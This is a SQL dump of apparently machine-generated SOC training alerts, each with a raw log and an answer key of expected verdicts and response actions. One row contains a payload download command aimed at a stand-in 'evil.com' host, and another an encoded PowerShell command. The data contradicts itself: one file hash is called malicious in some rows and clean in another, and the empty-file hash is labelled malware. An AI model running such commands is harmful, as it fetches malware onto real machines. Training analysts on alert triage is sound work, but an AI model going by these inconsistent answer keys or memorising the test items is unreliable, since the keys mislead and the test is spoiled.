(2167, 'Malicious Payload Download Detected via Reverse Engineered Macro', 'critical', 'Cuckoo Sandbox', 'A document macro executed a script to download a malicious payload from a suspicious domain, indicating potential data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:55:40Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.75\",\"username\":\"mike\",\"hostname\":\"mike-desktop\",\"command_line\":\"curl http://download.evil.com/malware.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malicious payloads\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://download.evil.com/malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a macro to download a payload from a known malicious domain confirms the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2168, 'Packed Executable Detected with Malicious Intent', 'high', 'Cuckoo Sandbox', 'A packed executable was analyzed and determined to contain malicious code. The executable attempts to establish a connection to a known C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"45.76.89.112\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"PEiD.exe /scan /deep C:\\\\malware\\\\packed.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.89.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in 37 AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"PEiD.exe /scan /deep C:\\\\malware\\\\packed.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for deep scanning packed executables\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The C2 IP and file hash are known malicious indicators, confirming the malware presence.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2169, 'Suspicious Macro Execution in Word Document', 'medium', 'Any.Run', 'A Word document with an embedded macro was executed, leading to potential malware download activity.', 'Malware', 'T1156', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.100\",\"username\":\"asmith\",\"hostname\":\"laptop-02\",\"command_line\":\"winword.exe /macro C:\\\\Users\\\\asmith\\\\Documents\\\\invoice.docm\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to malicious document download\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in 22 AV engines as malicious\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"winword.exe /macro C:\\\\Users\\\\asmith\\\\Documents\\\\invoice.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro execution linked to document download\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro execution led to a connection with a known malicious IP, confirming the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2170, 'Encoded Malicious Command Execution Attempt', 'critical', 'IDA Pro', 'A Base64 encoded command was executed on a server, potentially indicating a script-based attack vector.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"rthomas\",\"hostname\":\"server-01\",\"command_line\":\"powershell.exe -enc U2V0LUV4ZWN1dGlvbkB0YXNrIC1jb21tYW5kICdzY3JpcHQn\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of source machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc U2V0LUV4ZWN1dGlvbkB0YXNrIC1jb21tYW5kICdzY3JpcHQn\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command linked to malicious script execution\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The Base64 encoded command is linked to known malicious script execution patterns.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2171, 'False Positive: Legitimate Software Update Misidentified as Malware', 'low', 'Ghidra', 'A legitimate software update was misidentified as a potential malware due to its packed nature.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.50\",\"username\":\"dlee\",\"hostname\":\"server-05\",\"command_line\":\"update.exe /silent\",\"file_hash\":\"3a5f8e9d5a2e3c6d7b3b8a3f2d9e6a5b\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of update server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f8e9d5a2e3c6d7b3b8a3f2d9e6a5b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash confirmed as benign software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The software update was mistakenly flagged due to its packed nature but is verified as legitimate.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2172, 'False Positive: Routine Network Scan Mistaken for Malicious Activity', 'low', 'Cuckoo Sandbox', 'A network scan performed by IT was misinterpreted as malicious lateral movement within the network.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"sysadmin\",\"hostname\":\"admin-console\",\"command_line\":\"nmap -sP 192.168.1.0/24\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used by IT for network management\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sP 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for routine network scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network scan was a routine operation by IT staff and not an indication of malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2173, 'Suspicious Packed Executable Detected', 'high', 'Cuckoo Sandbox', 'A packed executable was detected attempting to execute on an internal machine. Analysis shows potential for malicious behavior.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-123\",\"command_line\":\"cmd.exe /c start C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash reported in multiple incidents\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"cmd.exe /c start C:\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of a known suspicious command\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a packed executable with known malicious hash indicates a likely malware incident.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2174, 'Malicious Macro Execution Detected', 'critical', 'Any.Run', 'An Office document with an embedded macro was executed, which connects to a known malicious C2 server.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.0.15\",\"dst_ip\":\"203.0.113.77\",\"username\":\"asmith\",\"hostname\":\"laptop-001\",\"command_line\":\"winword.exe /macro C:\\\\Users\\\\asmith\\\\malicious.docm\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for command and control activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document hash matches known malicious macro\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a malicious macro that communicates with a known C2 server confirms this as a true positive.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2175, 'Potential Malware Detected via Packed Executable', 'medium', 'Ghidra', 'A packed executable was identified with suspicious behavior, matching patterns of known malware.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"\",\"username\":\"mwhite\",\"hostname\":\"desktop-007\",\"command_line\":\"C:\\\\Program Files\\\\malicious_packed.exe\",\"file_hash\":\"3c4e7f33b4e7f4e5b5f9c3b4d5e8c0f0\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3c4e7f33b4e7f4e5b5f9c3b4d5e8c0f0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with packed malware variants\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\malicious_packed.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution pattern resembles malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable shows behavior consistent with known malware, warranting further investigation.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2176, 'Packed Executable Anomaly - False Positive', 'low', 'IDA Pro', 'A packed executable was identified but analysis confirmed it as a legitimate software update.', 'Malware', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.55\",\"dst_ip\":\"\",\"username\":\"lgrace\",\"hostname\":\"server-022\",\"command_line\":\"C:\\\\Updates\\\\legit_update.exe\",\"file_hash\":\"abcdef1234567890abcdef1234567890\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcdef1234567890abcdef1234567890\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this hash\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Updates\\\\legit_update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as legitimate update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Further analysis confirmed the executable as part of a legitimate software update, leading to false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2177, 'Benign Macro Execution Mistaken for Malicious Activity', 'medium', 'Cuckoo Sandbox', 'A macro was executed from an Office document but was verified as a legitimate business process.', 'Malware', 'T1203', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.20\",\"dst_ip\":\"\",\"username\":\"bjackson\",\"hostname\":\"workstation-204\",\"command_line\":\"excel.exe /macro C:\\\\Users\\\\bjackson\\\\business_report.xlsm\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Document hash clean, associated with business processes\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"excel.exe /macro C:\\\\Users\\\\bjackson\\\\business_report.xlsm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Execution of known business macro\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro was part of a regular business process, leading to a false positive detection.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2178, 'Suspicious Packed Executable Detected in Network', 'high', 'Cuckoo Sandbox', 'A packed executable was captured and analyzed revealing a suspicious behavior pattern. The file exhibited network communication attempts to a known C2 server.', 'Malware', 'T1059.003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.98\",\"username\":\"john.doe\",\"hostname\":\"workstation-01\",\"command_line\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\suspicious.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.98\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan.Generic by multiple AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable attempted to connect to a known malicious IP, indicating an active compromise.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2179, 'Macro-Based Malware Execution Detected', 'critical', 'Any.Run', 'A document with malicious macros was executed, leading to a download of a payload from an external server.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.20\",\"dst_ip\":\"198.51.100.12\",\"username\":\"alice.smith\",\"hostname\":\"workstation-02\",\"command_line\":\"C:\\\\Users\\\\alice.smith\\\\Documents\\\\invoice.docm\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Macro.Downloader by several AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected user\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of malicious macros led to a download from a known malicious server, confirming the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2180, 'Potential Malicious Macro Execution Flagged', 'medium', 'Ghidra', 'A document containing macros was executed, but further analysis suggests it was a benign template from a known good source.', 'Malware', 'T1203', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.25\",\"dst_ip\":\"203.0.113.15\",\"username\":\"charlie.brown\",\"hostname\":\"workstation-03\",\"command_line\":\"C:\\\\Users\\\\charlie.brown\\\\Documents\\\\report_template.docm\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected in the file hash\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the user\'s machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macros were part of a legitimate template, and the hash was verified as clean.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2181, 'Suspicious Network Activity from Internal Host', 'high', 'IDA Pro', 'Unusual network connections were made from an internal host to multiple unknown external IPs, potentially indicating a scanning activity.', 'Lateral Movement', 'T1049', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"david.johnson\",\"hostname\":\"workstation-04\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the scanning host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple scanning activities\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The connection pattern matches known reconnaissance techniques, suggesting lateral movement attempts.\"}', 'Intermediate', 'MAL', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2182, 'False Positive: Internal Network Scan Alert', 'low', 'Cuckoo Sandbox', 'An internal scan alert was triggered due to a legitimate network assessment being conducted by authorized personnel.', 'Lateral Movement', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.50\",\"dst_ip\":\"192.168.5.51\",\"username\":\"network_admin\",\"hostname\":\"security-tool\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.51\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The scan was part of a scheduled network assessment by the IT team, confirming no malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2183, 'Packed Executable Detected via Cuckoo Sandbox Analysis', 'high', 'Cuckoo Sandbox', 'A packed executable was detected and analyzed, revealing malicious behavior indicative of a malware infection. The executable attempted to connect to a known malicious IP for command and control.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.101\",\"username\":\"jdoe\",\"hostname\":\"compromised-host\",\"command_line\":\"malicious.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware C2 servers\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware family\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file packed, common in malicious activities\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable\'s network activity and file behavior confirmed malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2184, 'Suspicious Macro Detected in Document via Any.Run', 'critical', 'Any.Run', 'A document containing a suspicious macro was executed, leading to the download of additional malicious payloads. This indicates an ongoing malware infection attempt.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:47:29Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.42\",\"username\":\"asmith\",\"hostname\":\"office-pc\",\"command_line\":\"winword.exe /macro payload.docm\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing and malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash related to a known malicious macro\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"winword.exe /macro payload.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro execution in Office document, often used in attacks\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the affected user\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro\'s behavior and communication with a known malicious IP confirm the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
